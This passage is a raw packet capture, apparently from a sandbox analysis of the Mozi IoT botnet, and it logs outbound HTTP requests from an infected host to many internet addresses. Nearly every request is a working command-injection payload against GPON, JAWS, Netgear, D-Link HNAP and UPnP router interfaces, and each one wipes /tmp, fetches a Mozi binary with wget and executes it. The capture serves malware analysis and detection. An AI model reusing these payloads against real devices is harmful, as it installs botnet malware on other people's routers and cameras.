                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>


                                                                                                       Session ID  Source IP     Source Port  Destination IP   Destination Port
                                                                                                       10          192.168.2.20  46778        23.243.117.203   8080
                                                                                                       Timestamp                           kBytes transferred  Direction  Data
                                                                                                       Jan 6, 2021 14:58:35.732666969 CET  414                 OUT        POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:8080
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
                                                                                                       Jan 6, 2021 14:58:36.233577013 CET  415                 OUT        POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:8080
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
                                                                                                       Jan 6, 2021 14:58:36.837584972 CET  425                 OUT        POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:8080
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                                                       Session ID  Source IP     Source Port  Destination IP   Destination Port
                                                                                                       11          192.168.2.20  34684        203.146.142.202  80
                                                                                                       Timestamp                           kBytes transferred  Direction  Data
                                                                                                       Jan 6, 2021 14:58:35.786518097 CET  415                 OUT        GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 203.146.142.202:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                       Jan 6, 2021 14:58:36.373508930 CET  415                 OUT        GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 203.146.142.202:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                       Jan 6, 2021 14:58:37.153589964 CET  425                 OUT        GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 203.146.142.202:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                       Jan 6, 2021 14:58:37.968555927 CET  426                 IN         HTTP/1.1 403 Forbidden
                                                                                                        Date: Wed, 06 Jan 2021 13:58:37 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 214
                                                                                                        Keep-Alive: timeout=15, max=100
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.<br /></p></body></html>


                                                                                                       Session ID  Source IP     Source Port  Destination IP   Destination Port
                                                                                                       12          192.168.2.20  36646        104.238.159.33   80
                                                                                                       Timestamp                           kBytes transferred  Direction  Data
                                                                                                       Jan 6, 2021 14:58:38.155071020 CET  427                 OUT        POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                       Jan 6, 2021 14:58:38.195677042 CET  427                 IN         HTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 13:58:38 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        Server: Apache/2.2.15 (CentOS)
                                                                                                        Content-Encoding: gzip
                                                                                                       Jan 6, 2021 14:58:38.195785999 CET  428                 IN         HTTP/1.1 400 Bad Request
                                                                                                        Date: Wed, 06 Jan 2021 13:58:38 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 150
                                                                                                        Connection: close
                                                                                                        Server: Apache/2.2.15 (CentOS)
                                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                       Session ID  Source IP     Source Port  Destination IP   Destination Port
                                                                                                       13          192.168.2.20  34926        14.250.195.170   49152
                                                                                                       Timestamp                           kBytes transferred  Direction  Data
                                                                                                       Jan 6, 2021 14:58:49.789874077 CET  484                 OUT        POST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                                                        Host: 14.250.195.170:49152
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>
                                                                                                       Jan 6, 2021 14:58:50.034817934 CET  485                 IN         HTTP/1.1 500 Internal Server Error
                                                                                                        CONTENT-LENGTH: 412
                                                                                                        CONTENT-TYPE: text/xml; charset="utf-8"
                                                                                                        DATE: Wed, 06 Jan 2021 20:56:45 GMT
                                                                                                        EXT:
                                                                                                        SERVER: Linux/3.0.8, UPnP/1.0, Portable SDK for UPnP devices/1.6.18
                                                                                                        X-User-Agent: redsonic
                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><s:Fault><faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring><detail><UPnPError xmlns="urn:schemas-upnp-org:control-1-0"><errorCode>401</errorCode><errorDescription>Invalid Action</errorDescription></UPnPError></detail></s:Fault></s:Body></s:Envelope>


                                                                                                       Session ID  Source IP     Source Port  Destination IP   Destination Port
                                                                                                       14          192.168.2.20  48360        54.164.156.191   80
                                                                                                       Timestamp                           kBytes transferred  Direction  Data
                                                                                                       Jan 6, 2021 14:58:52.663357973 CET  504                 OUT        GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 54.164.156.191:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                       Jan 6, 2021 14:58:52.789906025 CET  505                 IN         HTTP/1.1 503 Service Unavailable: Back-end server is at capacity
                                                                                                        Content-Length: 0
                                                                                                        Connection: keep-alive


                                                                                                       Session ID  Source IP     Source Port  Destination IP   Destination Port
                                                                                                       15          192.168.2.20  50064        107.20.106.251   80
                                                                                                       Timestamp                           kBytes transferred  Direction  Data
                                                                                                       Jan 6, 2021 14:58:55.687509060 CET  510                 OUT        GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                       Jan 6, 2021 14:58:55.926536083 CET  512                 IN         HTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 13:58:55 GMT
                                                                                                        Server: Apache
                                                                                                        X-Powered-By: PHP/7.4.9
                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                        Link: <http:/wp-json/>; rel="https://api.w.org/"
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Vary: Cookie
                                                                                                        Cache-Control: s-maxage=10
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Data Ascii: <!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11">... This site is optimized with the Yoast SEO plugin v15.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - TRAVELLINGMOVE</title><meta name="robots" content="noindex, follow" /><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - TRAVELLINGMOVE" /><meta property="og:site_name" content="TRAVELLINGMOVE" /><script type="application/ld+json" class="yoast-schema-graph">{ "@context": "https://schema.org", "@graph": [ { "@type": "WebSite", "@id": "https://107.20.106.251/#website", "url": "https://107.20.106.251/", "name": "TRAVELLINGMOVE", "description": "EXPERIENCE THE EXCITEMENT!",


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                        16 | 192.168.2.20 | 52998 | 116.206.55.142 | 52869
                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                        Jan 6, 2021 14:58:56.748678923 CET | 544 | OUT | POST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:58:57.226623058 CET | 545 | OUT | POST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:58:57.790584087 CET | 555 | OUT | POST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:58:58.922597885 CET | 558 | OUT | POST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:59:01.182790995 CET | 571 | OUT | POST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:59:05.703001022 CET | 593 | OUT | POST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:59:14.759443998 CET | 638 | OUT | POST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:59:32.872359037 CET | 728 | OUT | POST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 15:00:09.098093987 CET | 896 | OUT | POST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                        17192.168.2.2035196104.115.250.11480
                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                        Jan 6, 2021 14:59:03.853110075 CET | 582 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 14:59:04.186294079 CET | 583 | IN | HTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 208
                                                                                                        Expires: Wed, 06 Jan 2021 13:59:04 GMT
                                                                                                        Date: Wed, 06 Jan 2021 13:59:04 GMT
                                                                                                        Connection: close
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;76434acb&#46;1609941544&#46;8533897</BODY></HTML>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                        18 | 192.168.2.20 | 47542 | 45.196.102.179 | 80
                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                        Jan 6, 2021 14:59:17.777331114 CET | 649 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 45.196.102.179:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                        Jan 6, 2021 14:59:18.054861069 CET | 650 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Jan 2021 13:59:17 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 566
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                        19192.168.2.2037970175.252.8.1848080
                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                        Jan 6, 2021 14:59:24.779999018 CET | 683 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 14:59:25.038872004 CET | 683 | IN | HTTP/1.1 404 Not Found
                                                                                                        Content-Type: text/plain
                                                                                                        Content-Length: 30
                                                                                                        Connection: close


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                        2 | 192.168.2.20 | 54436 | 107.170.200.206 | 80
                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                        Jan 6, 2021 14:57:39.698870897 CET | 124 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 107.170.200.206:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 14:57:39.902827024 CET | 126 | IN | HTTP/1.1 405 Not Allowed
                                                                                                        Server: nginx/1.10.3 (Ubuntu)
                                                                                                        Date: Wed, 06 Jan 2021 13:57:39 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 182
                                                                                                        Connection: close
                                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                        20192.168.2.204292223.96.36.24380
                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                        Jan 6, 2021 14:59:38.626832008 CET | 752 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 15:00:05.078109980 CET | 876 | IN | HTTP/1.1 200 OK
                                                                                                        Cache-Control: no-cache
                                                                                                        Content-Type: text/html
                                                                                                        Content-Encoding: gzip
                                                                                                        Vary: Accept-Encoding
                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                        X-Powered-By: ASP.NET
                                                                                                        Date: Wed, 06 Jan 2021 14:00:05 GMT
                                                                                                        Content-Length: 853
                                                                                                        Jan 6, 2021 15:00:05.087344885 CET | 877 | IN | HTTP/1.1 400 Bad Request
                                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                        Date: Wed, 06 Jan 2021 14:00:05 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 326
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Verb</h2><hr><p>HTTP Error 400. The request verb is invalid.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
21 | 192.168.2.20 | 40718 | 50.21.190.165 | 8443
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 14:59:52.727588892 CET | 816 | OUT | GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                                                        Data Raw:
                                                                                                        Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port
22 | 192.168.2.20 | 44286 | 34.117.168.156 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 14:59:53.556488037 CET | 824 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 34.117.168.156:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
